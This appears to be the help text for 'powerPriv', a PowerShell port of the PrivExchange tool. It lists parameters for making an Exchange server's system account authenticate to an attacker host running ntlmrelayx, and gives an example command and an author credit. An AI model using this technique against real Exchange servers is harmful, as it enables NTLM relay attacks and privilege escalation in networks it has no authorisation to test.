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A Powershell implementation of PrivExchange designed to run under the current user's context



A powershell implementation of PrivExchange by @_dirkjan (original code found here: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Useful for environments on which you cannot run python-based applications, have user credentials, or do not want to drop files to disk. Will cause the target exchange server system account to attempt to authenticate to a system of your choice.


Hostname or IP of the target exchange box. Based on DNS config may require FQDN if using hostname. (Required)


Hostname or IP of a system you control, and are ideally running ntlmrelayx on. We are telling the Exchange server to attempt to authenticate to this system. Based on DNS config may require FQDN if using hostname. (Required)


Port to attempt to connect to Exchange server over. Default is 443.


Port Exchange should attempt to connect back to the attacker over. Default is 80


Page we are telling the Exchange server to connect to on our attack system. Slashes are not required. Default is powerPriv.


Set to true if you dont want to use https to connect initially to the Exchange server. Default is false (use https).


Version of Exchange server we're targeting. Default is 2013.


powerPriv -targetHost corpExch01 -attackerHost -Version 2016


Author: @g0ldenGunSec  - Based on the tool created by @_dirkjan
Only use this tool on networks you own or have permission to test against.